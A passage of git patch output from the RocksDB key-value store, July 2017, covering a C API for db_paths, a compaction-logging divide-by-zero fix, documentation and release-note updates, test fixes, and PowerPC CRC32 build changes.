a/db/c.cc +++ b/db/c.cc @@ -52,6 +52,7 @@ using rocksdb::CompressionType; using rocksdb::WALRecoveryMode; using rocksdb::DB; using rocksdb::DBOptions; +using rocksdb::DbPath; using rocksdb::Env; using rocksdb::EnvOptions; using rocksdb::InfoLogLevel; @@ -382,6 +383,10 @@ struct rocksdb_mergeoperator_t : public MergeOperator { } }; +struct rocksdb_dbpath_t { + DbPath rep; +}; + struct rocksdb_env_t { Env* rep; bool is_default; @@ -2009,6 +2014,16 @@ void rocksdb_options_set_paranoid_checks( opt->rep.paranoid_checks = v; } +void rocksdb_options_set_db_paths(rocksdb_options_t* opt, + const rocksdb_dbpath_t** dbpath_values, + size_t num_paths) { + std::vector db_paths(num_paths); + for (size_t i = 0; i < num_paths; ++i) { + db_paths[i] = dbpath_values[i]->rep; + } + opt->rep.db_paths = db_paths; +} + void rocksdb_options_set_env(rocksdb_options_t* opt, rocksdb_env_t* env) { opt->rep.env = (env ? 
env->rep : nullptr); } @@ -2789,6 +2804,17 @@ size_t rocksdb_cache_get_pinned_usage(rocksdb_cache_t* cache) { return cache->rep->GetPinnedUsage(); } +rocksdb_dbpath_t* rocksdb_dbpath_create(const char* path, uint64_t target_size) { + rocksdb_dbpath_t* result = new rocksdb_dbpath_t; + result->rep.path = std::string(path); + result->rep.target_size = target_size; + return result; +} + +void rocksdb_dbpath_destroy(rocksdb_dbpath_t* dbpath) { + delete dbpath; +} + rocksdb_env_t* rocksdb_create_default_env() { rocksdb_env_t* result = new rocksdb_env_t; result->rep = Env::Default(); diff --git a/db/c_test.c b/db/c_test.c index 57f19aa9686..4bdf89bee52 100644 --- a/db/c_test.c +++ b/db/c_test.c @@ -41,6 +41,7 @@ static char dbname[200]; static char sstfilename[200]; static char dbbackupname[200]; static char dbcheckpointname[200]; +static char dbpathname[200]; static void StartPhase(const char* name) { fprintf(stderr, "=== Test %s\n", name); @@ -351,6 +352,7 @@ int main(int argc, char** argv) { rocksdb_t* db; rocksdb_comparator_t* cmp; rocksdb_cache_t* cache; + rocksdb_dbpath_t *dbpath; rocksdb_env_t* env; rocksdb_options_t* options; rocksdb_compactoptions_t* coptions; @@ -385,8 +387,14 @@ int main(int argc, char** argv) { GetTempDir(), ((int)geteuid())); + snprintf(dbpathname, sizeof(dbpathname), + "%s/rocksdb_c_test-%d-dbpath", + GetTempDir(), + ((int) geteuid())); + StartPhase("create_objects"); cmp = rocksdb_comparator_create(NULL, CmpDestroy, CmpCompare, CmpName); + dbpath = rocksdb_dbpath_create(dbpathname, 1024 * 1024); env = rocksdb_create_default_env(); cache = rocksdb_cache_create_lru(100000); @@ -1440,6 +1448,18 @@ int main(int argc, char** argv) { CheckNoError(err); } + // Simple sanity check that options setting db_paths work. + StartPhase("open_db_paths"); + { + rocksdb_close(db); + rocksdb_destroy_db(options, dbname, &err); + + const rocksdb_dbpath_t* paths[1] = {dbpath}; + rocksdb_options_set_db_paths(options, paths, 1); + db = rocksdb_open(options, dbname, &err); + CheckNoError(err); + } + StartPhase("cleanup"); rocksdb_close(db); rocksdb_options_destroy(options); @@ -1449,6 +1469,7 @@ int main(int argc, char** argv) { rocksdb_compactoptions_destroy(coptions); rocksdb_cache_destroy(cache); rocksdb_comparator_destroy(cmp); + rocksdb_dbpath_destroy(dbpath); rocksdb_env_destroy(env); fprintf(stderr, "PASS\n"); diff --git a/include/rocksdb/c.h b/include/rocksdb/c.h index 34364deac09..2d33560390d 100644 --- a/include/rocksdb/c.h +++ b/include/rocksdb/c.h @@ -82,6 +82,7 @@ typedef struct rocksdb_compactionfiltercontext_t typedef struct rocksdb_compactionfilterfactory_t rocksdb_compactionfilterfactory_t; typedef struct rocksdb_comparator_t rocksdb_comparator_t; +typedef struct rocksdb_dbpath_t rocksdb_dbpath_t; typedef struct rocksdb_env_t rocksdb_env_t; typedef struct rocksdb_fifo_compaction_options_t rocksdb_fifo_compaction_options_t; typedef struct rocksdb_filelock_t rocksdb_filelock_t; @@ -713,6 +714,9 @@ extern ROCKSDB_LIBRARY_API void rocksdb_options_set_error_if_exists( rocksdb_options_t*, unsigned char); extern ROCKSDB_LIBRARY_API void rocksdb_options_set_paranoid_checks( rocksdb_options_t*, unsigned char); +extern ROCKSDB_LIBRARY_API void rocksdb_options_set_db_paths(rocksdb_options_t*, + const rocksdb_dbpath_t** path_values, + size_t num_paths); extern ROCKSDB_LIBRARY_API void rocksdb_options_set_env(rocksdb_options_t*, rocksdb_env_t*); extern ROCKSDB_LIBRARY_API void rocksdb_options_set_info_log(rocksdb_options_t*, @@ -1089,6 +1093,11 @@ 
rocksdb_cache_get_usage(rocksdb_cache_t* cache); extern ROCKSDB_LIBRARY_API size_t rocksdb_cache_get_pinned_usage(rocksdb_cache_t* cache); +/* DBPath */ + +extern ROCKSDB_LIBRARY_API rocksdb_dbpath_t* rocksdb_dbpath_create(const char* path, uint64_t target_size); +extern ROCKSDB_LIBRARY_API void rocksdb_dbpath_destroy(rocksdb_dbpath_t*); + /* Env */ extern ROCKSDB_LIBRARY_API rocksdb_env_t* rocksdb_create_default_env(); From ea8ad4f6780509ef50a3e0e051aed0ae4a0a1d22 Mon Sep 17 00:00:00 2001 From: Islam AbdelRahman Date: Mon, 24 Jul 2017 11:53:03 -0700 Subject: [PATCH 034/205] Fix compaction div by zero logging Summary: We will divide by zero if `stats.micros` is zero; just add a simple check. This happens sometimes when running tests, and UBSAN complains. Closes https://github.com/facebook/rocksdb/pull/2631 Differential Revision: D5481455 Pulled By: IslamAbdelRahman fbshipit-source-id: 69aa24e64e21de15d9e2b8009adf01675fcc6598 --- db/compaction_job.cc | 18 +++++++++++++----- 1 file changed, 13 insertions(+), 5 deletions(-) diff --git a/db/compaction_job.cc b/db/compaction_job.cc index 636cdbea183..75f5ab6c85c 100644 --- a/db/compaction_job.cc +++ b/db/compaction_job.cc @@ -594,6 +594,9 @@ Status CompactionJob::Install(const MutableCFOptions& mutable_cf_options) { double read_write_amp = 0.0; double write_amp = 0.0; + double bytes_read_per_sec = 0; + double bytes_written_per_sec = 0; + if (stats.bytes_read_non_output_levels > 0) { read_write_amp = (stats.bytes_written + stats.bytes_read_output_level + stats.bytes_read_non_output_levels) / static_cast<double>(stats.bytes_read_non_output_levels); write_amp = stats.bytes_written / static_cast<double>(stats.bytes_read_non_output_levels); } + if (stats.micros > 0) { + bytes_read_per_sec = + (stats.bytes_read_non_output_levels + stats.bytes_read_output_level) / + static_cast<double>(stats.micros); + bytes_written_per_sec = + stats.bytes_written / static_cast<double>(stats.micros); + } + ROCKS_LOG_BUFFER( log_buffer_, "[%s] compacted to: %s, MB/sec: %.1f rd, %.1f wr, level %d, " "files in(%d, %d) out(%d) " "MB in(%.1f, %.1f) out(%.1f), read-write-amplify(%.1f) " "write-amplify(%.1f) %s, records in: %d, records dropped: %d\n", - cfd->GetName().c_str(), vstorage->LevelSummary(&tmp), - (stats.bytes_read_non_output_levels + stats.bytes_read_output_level) / - static_cast<double>(stats.micros), - stats.bytes_written / static_cast<double>(stats.micros), - compact_->compaction->output_level(), + cfd->GetName().c_str(), vstorage->LevelSummary(&tmp), bytes_read_per_sec, + bytes_written_per_sec, compact_->compaction->output_level(), stats.num_input_files_in_non_output_levels, stats.num_input_files_in_output_level, stats.num_output_files, stats.bytes_read_non_output_levels / 1048576.0, From 06f19174499ac2d63a4f529aa8375cea02e6eca4 Mon Sep 17 00:00:00 2001 From: atkawa7 Date: Mon, 24 Jul 2017 14:57:33 -0700 Subject: [PATCH 035/205] add vcpkg as a Windows option Summary: Closes https://github.com/facebook/rocksdb/pull/2629 Differential Revision: D5483751 Pulled By: sagar0 fbshipit-source-id: 9719ef9edd936dbb89b8988e3f4cb912a234f00e --- INSTALL.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/INSTALL.md b/INSTALL.md index 820293a575e..04f0eb27976 100644 --- a/INSTALL.md +++ b/INSTALL.md @@ -113,6 +113,8 @@ to build a portable binary, add `PORTABLE=1` before your make commands, like thi * **Windows**: * For building with MS Visual Studio 13 you will need Update 4 installed.
* Read and follow the instructions at CMakeLists.txt + * Or install via [vcpkg](https://github.com/microsoft/vcpkg) + * run `vcpkg install rocksdb` * **AIX 6.1** * Install AIX Toolbox rpms with gcc From 9b11d4345a0f01fc3de756e01460bf1b0446f326 Mon Sep 17 00:00:00 2001 From: Thi Doan Date: Mon, 24 Jul 2017 14:59:34 -0700 Subject: [PATCH 036/205] Fix broken links Summary: Fixes broken links to the introductory talk I stumbled upon while reading the documentation. Closes https://github.com/facebook/rocksdb/pull/2628 Differential Revision: D5483851 Pulled By: sagar0 fbshipit-source-id: 94aab7fb4c4ed2305680a2fbc65b14c7977af6b8 --- docs/_docs/faq.md | 2 +- docs/_docs/getting-started.md | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/docs/_docs/faq.md b/docs/_docs/faq.md index 6253afeea12..0887a0987f7 100644 --- a/docs/_docs/faq.md +++ b/docs/_docs/faq.md @@ -13,7 +13,7 @@ RocksDB is an embeddable persistent key-value store for fast storage. RocksDB ca RocksDB builds on [LevelDB](https://code.google.com/p/leveldb/) to be scalable to run on servers with many CPU cores, to efficiently use fast storage, to support IO-bound, in-memory and write-once workloads, and to be flexible to allow for innovation. -For the latest details, watch [Mark Callaghan’s and Igor Canadi’s talk at CMU on 10/2015](https://scs.hosted.panopto.com/Panopto/Pages/Viewer.aspx?id=f4e0eb37-ae18-468f-9248-cb73edad3e56). [Dhruba Borthakur’s introductory talk](https://github.com/facebook/rocksdb/blob/gh-pages/intro.pdf?raw=true) from the Data @ Scale 2013 conference provides some perspective about how RocksDB has evolved. +For the latest details, watch [Mark Callaghan’s and Igor Canadi’s talk at CMU on 10/2015](https://scs.hosted.panopto.com/Panopto/Pages/Viewer.aspx?id=f4e0eb37-ae18-468f-9248-cb73edad3e56). [Dhruba Borthakur’s introductory talk](https://github.com/facebook/rocksdb/blob/gh-pages-old/intro.pdf?raw=true) from the Data @ Scale 2013 conference provides some perspective about how RocksDB has evolved. ## How does performance compare? diff --git a/docs/_docs/getting-started.md b/docs/_docs/getting-started.md index 0d5360932e7..8b01dfefd45 100644 --- a/docs/_docs/getting-started.md +++ b/docs/_docs/getting-started.md @@ -11,7 +11,7 @@ The RocksDB library provides a persistent key value store. Keys and values are a The library is maintained by the Facebook Database Engineering Team, and is based on [LevelDB](https://github.com/google/leveldb), by Sanjay Ghemawat and Jeff Dean at Google. -This overview gives some simple examples of how RocksDB is used. For the story of why RocksDB was created in the first place, see [Dhruba Borthakur’s introductory talk](https://github.com/facebook/rocksdb/blob/gh-pages/intro.pdf?raw=true) from the Data @ Scale 2013 conference. +This overview gives some simple examples of how RocksDB is used. For the story of why RocksDB was created in the first place, see [Dhruba Borthakur’s introductory talk](https://github.com/facebook/rocksdb/blob/gh-pages-old/intro.pdf?raw=true) from the Data @ Scale 2013 conference. 
## Opening A Database From 5e731a1382587eb163c533d80ab3544726bd9ed8 Mon Sep 17 00:00:00 2001 From: Andres Suarez Date: Tue, 25 Jul 2017 04:23:10 -0700 Subject: [PATCH 037/205] Remove unused rocksdb arcanist lib Differential Revision: D5470179 fbshipit-source-id: 475ad3b6a85ead5f8abddefddc607353ea8680af --- .deprecated_arcconfig | 17 ----------------- 1 file changed, 17 deletions(-) delete mode 100644 .deprecated_arcconfig diff --git a/.deprecated_arcconfig b/.deprecated_arcconfig deleted file mode 100644 index 6cf07ffacdd..00000000000 --- a/.deprecated_arcconfig +++ /dev/null @@ -1,17 +0,0 @@ -{ - "project_id" : "rocksdb", - "conduit_uri" : "https://phabricator.fb.com/api/", - "copyright_holder" : "Facebook", - "load" : [ - "arcanist_util" - ], - "lint.engine" : "FacebookFbcodeLintEngine", - "lint.engine.single.linter" : "FbcodeCppLinter", - "unit.engine" : "FacebookFbcodeUnitTestEngine", - "arcanist_configuration" : "FacebookArcanistConfiguration", - "base" : "git:HEAD^, hg:.^", - "git.default-relative-commit" : "HEAD^", - "git:arc.feature.start.default" : "origin/master", - "arc.feature.start.default" : "master", - "history.immutable" : false -} From 277f6f23d43aea930702a5e8f697c97e90fa81d8 Mon Sep 17 00:00:00 2001 From: Maysam Yabandeh Date: Tue, 25 Jul 2017 10:17:10 -0700 Subject: [PATCH 038/205] Release note for partitioned index/filters Summary: Closes https://github.com/facebook/rocksdb/pull/2637 Differential Revision: D5489751 Pulled By: maysamyabandeh fbshipit-source-id: 0298f8960d4f86ce67959616615beee4d802c2e4 --- HISTORY.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/HISTORY.md b/HISTORY.md index 7d98443720a..9d8468c6e28 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -12,6 +12,8 @@ * RateLimiter support for throttling background reads, or throttling the sum of background reads and writes. This can give more predictable I/O usage when compaction reads more data than it writes, e.g., due to lots of deletions. * [Experimental] FIFO compaction with TTL support. It can be enabled by setting CompactionOptionsFIFO.ttl > 0. * Introduce `EventListener::OnBackgroundError()` callback. Users can implement it to be notified of errors causing the DB to enter read-only mode, and optionally override them. +* Partitioned Index/Filters are exiting the experimental mode. To enable partitioned indexes, set index_type to kTwoLevelIndexSearch; to further enable partitioned filters, set partition_filters to true. To configure the partition size, set metadata_block_size. + ### Bug Fixes * Fix discarding empty compaction output files when `DeleteRange()` is used together with subcompactions. From 2b259c9d496af4c2a48a6664d9df32010f594264 Mon Sep 17 00:00:00 2001 From: Maysam Yabandeh Date: Tue, 25 Jul 2017 11:33:07 -0700 Subject: [PATCH 039/205] Lower num of iterations in DeadlockCycle test Summary: Currently this test times out with tsan, likely due to decreased execution speed under tsan. By lowering the number of iterations we can still catch a bug, as the test is run regularly and multiple runs of the test are equivalent to running the test with more iterations.
Closes https://github.com/facebook/rocksdb/pull/2639 Differential Revision: D5490549 Pulled By: maysamyabandeh fbshipit-source-id: bd69c42a9728d337ac95a06a401088384e51731a --- utilities/transactions/transaction_test.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/utilities/transactions/transaction_test.cc b/utilities/transactions/transaction_test.cc index ce01388f8a8..148f1c41c24 100644 --- a/utilities/transactions/transaction_test.cc +++ b/utilities/transactions/transaction_test.cc @@ -543,7 +543,7 @@ TEST_P(TransactionTest, DeadlockCycle) { TEST_P(TransactionTest, DeadlockStress) { const uint32_t NUM_TXN_THREADS = 10; const uint32_t NUM_KEYS = 100; - const uint32_t NUM_ITERS = 100000; + const uint32_t NUM_ITERS = 10000; WriteOptions write_options; ReadOptions read_options; From 30edff308ea49b65dc18d1da82ba3ba889028a21 Mon Sep 17 00:00:00 2001 From: Andrew Gallagher Date: Tue, 25 Jul 2017 12:02:44 -0700 Subject: [PATCH 040/205] buckification: remove explicit `-msse*` compiler flags Summary: These are implied by default platform flags, in particular, `-march=corei7`. Reviewed By: pixelb Differential Revision: D5485414 fbshipit-source-id: 85f1329c71fa81a604760844187cc73877fb40e9 --- TARGETS | 2 -- 1 file changed, 2 deletions(-) diff --git a/TARGETS b/TARGETS index c6c0de48bc0..4124eec4e99 100644 --- a/TARGETS +++ b/TARGETS @@ -6,8 +6,6 @@ REPO_PATH = TARGETS_PATH[(TARGETS_PATH.find('fbcode/') + len('fbcode/')):] + "/" BUCK_BINS = "buck-out/gen/" + REPO_PATH TEST_RUNNER = REPO_PATH + "buckifier/rocks_test_runner.sh" rocksdb_compiler_flags = [ - "-msse", - "-msse4.2", "-fno-builtin-memcmp", "-DROCKSDB_PLATFORM_POSIX", "-DROCKSDB_LIB_IO_POSIX", From addbd279c271e987778d20e9a6191fa19023be6d Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Tue, 25 Jul 2017 12:18:17 -0700 Subject: [PATCH 041/205] 5.6.1 release blog post Summary: 5.6.1 release blog post Closes https://github.com/facebook/rocksdb/pull/2638 Differential Revision: D5491168 Pulled By: yiwu-arbug fbshipit-source-id: 14e3a92a03684afa4bd19bfb3ffb053cc09f5d4a --- ...2017-07-25-rocksdb-5-6-1-released.markdown | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 docs/_posts/2017-07-25-rocksdb-5-6-1-released.markdown diff --git a/docs/_posts/2017-07-25-rocksdb-5-6-1-released.markdown b/docs/_posts/2017-07-25-rocksdb-5-6-1-released.markdown new file mode 100644 index 00000000000..3b54ffd5ad8 --- /dev/null +++ b/docs/_posts/2017-07-25-rocksdb-5-6-1-released.markdown @@ -0,0 +1,22 @@ +--- +title: RocksDB 5.6.1 Released! +layout: post +author: yiwu +category: blog +--- + +### Public API Change +* Setting `max_background_flushes=0` to schedule flushes and compactions in the same thread pool is no longer supported. Instead, users can achieve this by configuring their high-pri thread pool to have zero threads. See https://github.com/facebook/rocksdb/wiki/Thread-Pool for more details. +* Replace `Options::max_background_flushes`, `Options::max_background_compactions`, and `Options::base_background_compactions` all with `Options::max_background_jobs`, which automatically decides how many threads to allocate towards flush/compaction. +* options.delayed_write_rate by default takes its value from the options.rate_limiter rate. +* Replace global variable `IOStatsContext iostats_context` with `IOStatsContext* get_iostats_context()`; replace global variable `PerfContext perf_context` with `PerfContext* get_perf_context()`. + +### New Features +* Change ticker/histogram statistics implementations to use core-local storage.
This improves aggregation speed compared to our previous thread-local approach, particularly for applications with many threads. See http://rocksdb.org/blog/2017/05/14/core-local-stats.html for more details. +* Users can pass a cache object to write buffer manager, so that they can cap memory usage for memtable and block cache using a single limit. +* Flush will be triggered when memory usage reaches 7/8 of the limit introduced by write_buffer_manager or db_write_buffer_size, so that the hard threshold is rarely hit. See https://github.com/facebook/rocksdb/wiki/Write-Buffer-Manager for more details. +* Introduce WriteOptions.low_pri. If it is true, low priority writes will be throttled if the compaction is behind. See https://github.com/facebook/rocksdb/wiki/Low-Priority-Write for more details. +* `DB::IngestExternalFile()` now supports ingesting files into a database containing range deletions. + +### Bug Fixes +* Shouldn't ignore return value of fsync() in flush. From fe1a5559f3ef8fd1e915385a9673a19f0bfc7a6b Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Tue, 25 Jul 2017 16:40:21 -0700 Subject: [PATCH 042/205] Fix flaky write_callback_test Summary: The test is failing occasionally on the assert: `ASSERT_TRUE(writer->state == WriteThread::State::STATE_INIT)`. This is because the test doesn't make the leader wait long enough before updating state for its followers. The patch moves the update to `threads_waiting` to the end of the `WriteThread::JoinBatchGroup:Wait` callback to avoid this. It also adds `WriteThread::JoinBatchGroup:Start` and has each thread wait there while another thread is linking to the linked list, to make the check of `is_leader` more deterministic. It also changes two while-loops of `compare_exchange_strong` to plain `fetch_add`, to make the code cleaner. Closes https://github.com/facebook/rocksdb/pull/2640 Differential Revision: D5491525 Pulled By: yiwu-arbug fbshipit-source-id: 6e897f122082bd6f98e6d51b31a25e5fd0a3fb82 --- db/write_callback_test.cc | 54 ++++++++++++++++++++++++++------------- db/write_thread.cc | 3 ++- 2 files changed, 38 insertions(+), 19 deletions(-) diff --git a/db/write_callback_test.cc b/db/write_callback_test.cc index 9edf1c1581e..d2bf30a0930 100644 --- a/db/write_callback_test.cc +++ b/db/write_callback_test.cc @@ -16,7 +16,6 @@ #include "rocksdb/db.h" #include "rocksdb/write_batch.h" #include "port/port.h" -#include "util/logging.h" #include "util/random.h" #include "util/sync_point.h" #include "util/testharness.h" @@ -107,6 +106,10 @@ TEST_F(WriteCallbackTest, WriteWithCallbackTest) { std::vector> kvs_; }; + // In each scenario we'll launch multiple threads to write. + // The size of each array equals the number of threads, and + // each boolean in it denotes whether the callback of the + // corresponding thread should succeed or fail. std::vector> write_scenarios = { {true}, {false}, @@ -145,23 +148,37 @@ TEST_F(WriteCallbackTest, WriteWithCallbackTest) { db_impl = dynamic_cast<DBImpl*>(db); ASSERT_TRUE(db_impl); - std::atomic<uint64_t> threads_waiting(0); + // Writers that have called JoinBatchGroup. + std::atomic<uint64_t> threads_joining(0); + // Writers that have linked to the queue. + std::atomic<uint64_t> threads_linked(0); + // Writers that pass WriteThread::JoinBatchGroup:Wait sync-point.
+ std::atomic<uint64_t> threads_verified(0); + + std::atomic<uint64_t> seq(db_impl->GetLatestSequenceNumber()); ASSERT_EQ(db_impl->GetLatestSequenceNumber(), 0); + rocksdb::SyncPoint::GetInstance()->SetCallBack( + "WriteThread::JoinBatchGroup:Start", [&](void*) { + uint64_t cur_threads_joining = threads_joining.fetch_add(1); + // Wait for the last joined writer to link to the queue. + // In this way the writers link to the queue one by one. + // This allows us to confidently detect the first writer + // who increases threads_linked as the leader. + while (threads_linked.load() < cur_threads_joining) { + } + }); + + // Verification once writers call JoinBatchGroup. rocksdb::SyncPoint::GetInstance()->SetCallBack( "WriteThread::JoinBatchGroup:Wait", [&](void* arg) { - uint64_t cur_threads_waiting = 0; + uint64_t cur_threads_linked = threads_linked.fetch_add(1); bool is_leader = false; bool is_last = false; // who am i - do { - cur_threads_waiting = threads_waiting.load(); - is_leader = (cur_threads_waiting == 0); - is_last = (cur_threads_waiting == write_group.size() - 1); - } while (!threads_waiting.compare_exchange_strong( - cur_threads_waiting, cur_threads_waiting + 1)); + is_leader = (cur_threads_linked == 0); + is_last = (cur_threads_linked == write_group.size() - 1); // check my state auto* writer = reinterpret_cast<WriteThread::Writer*>(arg); @@ -185,8 +202,10 @@ TEST_F(WriteCallbackTest, WriteWithCallbackTest) { !write_group.back().callback_.should_fail_); } - // wait for friends - while (threads_waiting.load() < write_group.size()) { + threads_verified.fetch_add(1); + // Wait here until all verification in this sync-point + // callback finishes for all writers. + while (threads_verified.load() < write_group.size()) { } }); @@ -211,17 +230,20 @@ TEST_F(WriteCallbackTest, WriteWithCallbackTest) { std::atomic<uint32_t> thread_num(0); std::atomic<char> dummy_key(0); + + // Each write thread creates a random write batch and writes it to DB + // with a write callback.
std::function<void()> write_with_callback_func = [&]() { uint32_t i = thread_num.fetch_add(1); Random rnd(i); // leaders gotta lead - while (i > 0 && threads_waiting.load() < 1) { + while (i > 0 && threads_verified.load() < 1) { } // loser has to lose while (i == write_group.size() - 1 && - threads_waiting.load() < write_group.size() - 1) { + threads_verified.load() < write_group.size() - 1) { } auto& write_op = write_group.at(i); @@ -231,11 +253,7 @@ TEST_F(WriteCallbackTest, WriteWithCallbackTest) { // insert some keys for (uint32_t j = 0; j < rnd.Next() % 50; j++) { // grab unique key - char my_key = 0; - do { - my_key = dummy_key.load(); - } while ( - !dummy_key.compare_exchange_strong(my_key, my_key + 1)); + char my_key = dummy_key.fetch_add(1); string skey(5, my_key); string sval(10, my_key); diff --git a/db/write_thread.cc b/db/write_thread.cc index 7063469967b..4a9fc1406bf 100644 --- a/db/write_thread.cc +++ b/db/write_thread.cc @@ -269,8 +269,9 @@ void WriteThread::CompleteFollower(Writer* w, WriteGroup& write_group) { static WriteThread::AdaptationContext jbg_ctx("JoinBatchGroup"); void WriteThread::JoinBatchGroup(Writer* w) { - + TEST_SYNC_POINT_CALLBACK("WriteThread::JoinBatchGroup:Start", w); assert(w->batch != nullptr); + bool linked_as_leader = LinkOne(w, &newest_writer_); if (linked_as_leader) { SetState(w, STATE_GROUP_LEADER); From 30b58cf71a7a0f3c89889f8040829db1978f5240 Mon Sep 17 00:00:00 2001 From: Maysam Yabandeh Date: Tue, 25 Jul 2017 18:36:29 -0700 Subject: [PATCH 043/205] Remove the orphan assert on !need_log_sync Summary: We initially disabled support for write_options.sync when concurrent_prepare_ is set. We later added this support, but the statement asserting that this combination is not used was left behind. This patch cleans it up.
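The `compare_exchange_strong`-to-`fetch_add` simplification made in write_callback_test.cc above works because `fetch_add` already returns the value held before the increment; the two forms below are equivalent (a standalone sketch, not code from the patch):

```cpp
#include <atomic>
#include <cstdint>

std::atomic<uint64_t> counter(0);

uint64_t IncrementWithCasLoop() {
  // Old pattern: retry until we atomically install old_value + 1.
  uint64_t old_value;
  do {
    old_value = counter.load();
  } while (!counter.compare_exchange_strong(old_value, old_value + 1));
  return old_value;  // the value observed just before our increment
}

uint64_t IncrementWithFetchAdd() {
  // New pattern: a single atomic read-modify-write with the same result.
  return counter.fetch_add(1);
}
```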
Closes https://github.com/facebook/rocksdb/pull/2642 Differential Revision: D5496101 Pulled By: maysamyabandeh fbshipit-source-id: becbc503446f2a51bee24cc861958c090c724ec2 --- db/db_impl_write.cc | 1 - 1 file changed, 1 deletion(-) diff --git a/db/db_impl_write.cc b/db/db_impl_write.cc index f52bce611a9..b93dd6f8faa 100644 --- a/db/db_impl_write.cc +++ b/db/db_impl_write.cc @@ -230,7 +230,6 @@ Status DBImpl::WriteImpl(const WriteOptions& write_options, need_log_dir_sync, last_sequence + 1); } } else { - assert(!need_log_sync && !need_log_dir_sync); if (status.ok() && !write_options.disableWAL) { PERF_TIMER_GUARD(write_wal_time); // LastToBeWrittenSequence is increased inside WriteToWAL under From 2289d381153890e715718f6215909bdfc0e1224c Mon Sep 17 00:00:00 2001 From: Kamalalochana Subbaiah Date: Wed, 26 Jul 2017 09:33:07 -0700 Subject: [PATCH 044/205] CRC32 Power Optimization Changes Summary: Support for the PowerPC architecture, detecting AltiVec support. Closes https://github.com/facebook/rocksdb/pull/2353 Differential Revision: D5210948 Pulled By: siying fbshipit-source-id: 859a8c063d37697addd89ba2b8a14e5efd5d24bf --- Makefile | 77 +++- db/db_test_util.cc | 7 +- src.mk | 10 + tools/db_stress.cc | 16 +- util/crc32c.cc | 69 ++- util/crc32c_ppc.c | 95 ++++ util/crc32c_ppc.h | 23 + util/crc32c_ppc_asm.S | 753 ++++++++++++++++++++++++++++++ util/crc32c_ppc_constants.h | 893 ++++++++++++++++++++++++++++++++++++ util/ppc-opcode.h | 31 ++ 10 files changed, 1949 insertions(+), 25 deletions(-) create mode 100644 util/crc32c_ppc.c create mode 100644 util/crc32c_ppc.h create mode 100644 util/crc32c_ppc_asm.S create mode 100644 util/crc32c_ppc_constants.h create mode 100644 util/ppc-opcode.h diff --git a/Makefile b/Makefile index c40d741d7a8..c89e3a20449 100644 --- a/Makefile +++ b/Makefile @@ -96,6 +96,18 @@ OPT += -momit-leaf-frame-pointer endif endif +ifeq (,$(shell $(CXX) -fsyntax-only -maltivec -xc /dev/null 2>&1)) +CXXFLAGS += -DHAS_ALTIVEC +CFLAGS += -DHAS_ALTIVEC +HAS_ALTIVEC=1 +endif + +ifeq (,$(shell $(CXX) -fsyntax-only -mcpu=power8 -xc /dev/null 2>&1)) +CXXFLAGS += -DHAVE_POWER8 +CFLAGS += -DHAVE_POWER8 +HAVE_POWER8=1 +endif + # if we're compiling for release, compile without debug code (-DNDEBUG) and # don't treat warnings as errors ifeq ($(DEBUG_LEVEL),0) @@ -305,9 +317,9 @@ util/build_version.cc: FORCE else mv -f $@-t $@; fi endif -LIBOBJECTS = $(LIB_SOURCES:.cc=.o) -LIBOBJECTS += $(TOOL_LIB_SOURCES:.cc=.o) -MOCKOBJECTS = $(MOCK_LIB_SOURCES:.cc=.o) +LIBOBJECTS = $(LIB_SOURCES:.cc=.cc.o) $(LIB_SOURCES_C:.c=.c.o) $(LIB_SOURCES_ASM:.S=.S.o) +LIBOBJECTS += $(TOOL_LIB_SOURCES:.cc=.cc.o) +MOCKOBJECTS = $(MOCK_LIB_SOURCES:.cc=.cc.o) GTEST = $(GTEST_DIR)/gtest/gtest-all.o TESTUTIL = ./util/testutil.o @@ -555,14 +567,27 @@ $(SHARED2): $(SHARED4) $(SHARED3): $(SHARED4) ln -fs $(SHARED4) $(SHARED3) endif +SHARED_CC_OBJECTS = $(LIB_SOURCES:.cc=.cc.o) +SHARED_C_OBJECTS = $(LIB_SOURCES_C:.c=.c.o) +SHARED_ASM_OBJECTS = $(LIB_SOURCES_ASM:.S=.S.o) -shared_libobjects = $(patsubst %,shared-objects/%,$(LIBOBJECTS)) +SHARED_CC_LIBOBJECTS = $(patsubst %.cc.o,shared-objects/%.cc.o,$(SHARED_CC_OBJECTS)) +SHARED_C_LIBOBJECTS = $(patsubst %.c.o,shared-objects/%.c.o,$(SHARED_C_OBJECTS)) +SHARED_ASM_LIBOBJECTS = $(patsubst %.S.o,shared-objects/%.S.o,$(SHARED_ASM_OBJECTS)) + +shared_libobjects = $(SHARED_CC_LIBOBJECTS) $(SHARED_C_LIBOBJECTS) $(SHARED_ASM_LIBOBJECTS) CLEAN_FILES += shared-objects -$(shared_libobjects): shared-objects/%.o: %.cc +$(SHARED_CC_LIBOBJECTS): shared-objects/%.cc.o: %.cc + $(AM_V_CC)mkdir -p
$(@D) && $(CXX) $(CXXFLAGS) $(PLATFORM_SHARED_CFLAGS) -c $< -o $@ + +$(SHARED_C_LIBOBJECTS): shared-objects/%.c.o: %.c $(AM_V_CC)mkdir -p $(@D) && $(CXX) $(CXXFLAGS) $(PLATFORM_SHARED_CFLAGS) -c $< -o $@ -$(SHARED4): $(shared_libobjects) +$(SHARED_ASM_LIBOBJECTS): shared-objects/%.S.o: %.S + $(AM_V_CC)mkdir -p $(@D) && $(CXX) $(CXXFLAGS) $(PLATFORM_SHARED_CFLAGS) -c $< -o $@ + +$(SHARED4): $(shared_libobjects) $(CXX) $(PLATFORM_SHARED_LDFLAGS)$(SHARED3) $(CXXFLAGS) $(PLATFORM_SHARED_CFLAGS) $(shared_libobjects) $(LDFLAGS) -o $@ endif # PLATFORM_SHARED_EXT @@ -1642,12 +1667,26 @@ rocksdbjavastaticpublishcentral: mvn gpg:sign-and-deploy-file -Durl=https://oss.sonatype.org/service/local/staging/deploy/maven2/ -DrepositoryId=sonatype-nexus-staging -DpomFile=java/rocksjni.pom -Dfile=java/target/rocksdbjni-$(ROCKSDB_MAJOR).$(ROCKSDB_MINOR).$(ROCKSDB_PATCH).jar # A version of each $(LIBOBJECTS) compiled with -fPIC -java_libobjects = $(patsubst %,jl/%,$(LIBOBJECTS)) +JAVA_CC_OBJECTS = $(SHARED_CC_OBJECTS) +JAVA_C_OBJECTS = 